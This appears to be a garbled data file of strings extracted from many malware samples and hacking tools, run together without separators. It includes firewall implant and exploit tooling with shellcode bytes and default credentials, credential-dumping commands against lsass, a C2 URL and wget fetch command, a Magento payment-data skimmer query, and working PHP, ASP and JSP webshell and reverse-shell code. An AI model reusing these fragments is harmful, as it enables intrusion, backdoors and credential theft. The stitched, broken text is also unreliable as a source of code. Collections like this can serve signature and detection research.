1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
1 crypt
1 encryptpe_init
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",settingdownloadfile - exception:%s.cdllapp::initinstance() - evnet create successful.uploadfile - encryptbuffer errorw
1 :send to server failed.handshake with the server failed. error:decryption failed. context expired.mozilla/4.0 (compatible; msie8.0; windows nt 5.1)!(*@)(!@port!(*@)(!@urlmytmpfile.datsvchost.dll.logmozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0)%s\\%c%c%c%c%c%c%cwait:dcryption error! invalid charactersvcmsn.dllconfig service %s ok.install an service hosted by svchost.the dll file that to be released.man,it's meoh,shithallelujahnret == socket_errorrouji\\release\\install.pdbrouji\\svcmain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=mozilla/4.0 (compatible; windows nt 5.1; msie 7.0)name=%s&userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 email: wfs#encryptpe.com
1 cryptunprotectdatac
1 b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
1 homepage: www.encryptpe.com
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 outlook.exeproblem %s report %sipm.noteip..ip..taskip..stickynoteip..journalip..contactip..appointmentip..imapsysteminfo /fo tabletasklist /vipconfig /allcontent-type: jpegmicrosoft dh schannel cryptographic providerno data%d setime success.m
1 crypt32.dllcryptbinarytostringax;
1 sha-1withrsaencryptionpostal codetls-rsa-with-3des-ede-cbc-shachecking match for '%s' user %s host %s addr %spem_read_bio_privatekey failedusage: %s [-ehr] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllconnection from %s port %d/usr/etc/ssh_known_hostsversion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(rlimit_fsize, { 0, 0 }): %srunfile: couldn't load shell32.dll!runfile: couldn't find shellexecuteexa/w in shell32.dll!e
1 \x00scriptmanc:\\windows\\system32\\sysprep\\cryptbase.dllprobescriptfintprobescriptkids/c ping -n 2 127.0.0.1 & del \"sysscan.exe\"sysscan debug mode!!!this rechecking? (set 0/1 or press enter key)http://37.49.224.144:8189/manual_resultchecker end work!trying send result...bb2fa36aaa9541f0md5=denyip=rmfile=exec_packetbuild_iphdr
1 elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
1 projectdatadescryptokeepaliveipnetrowlogclientmessage|clienthostget_connectedco$
1 are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
2 epe: encryptpe v2.2007.12.1, copyright (c) wfs
1 crypto.cipher.aes(mod is null - %sfindnextfile
1 nvsmartmax.dll.urlnv.execryptprotectmemory failedcryptunprotectmemory failedr
1 (polyscrypt
2 pcrypt
1 /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
1 d$o* encrypted log found. an encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
1 connect to %s mssql server success. type command at prompt.;database=masterselect * from openrowset('sqloledb','trusted_connection=yes;data source=myserversekurlsa::msvsekurlsa::wdigestsekurlsa::kerberossekurlsa::tspkgsekurlsa::livesspsekurlsa::sspsekurlsa::processekurlsa::minidumpsekurlsa::pthsekurlsa::ticketssekurlsa::ekeyssekurlsa::dpapisekurlsa::credmancryptprimitives.pdbnow is t1oalice123bobby456
1 n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 form.z1form.z2tobinary(tobase64(\"->\"&\"|\")createfile szconfigpath errordecrypt old sname error is running!
1 explorer@4_browser@4?_tmd5@cryptns@@yapa_wpaxi@z.?av_nocrypt@cryptns@@c
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 cryptdll.dllmd5initmd5updatemd5final
1 .epe: encryptpe v2.2006.1.15h'
1 homepage: www.encrypt
1 khrome crypt
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' 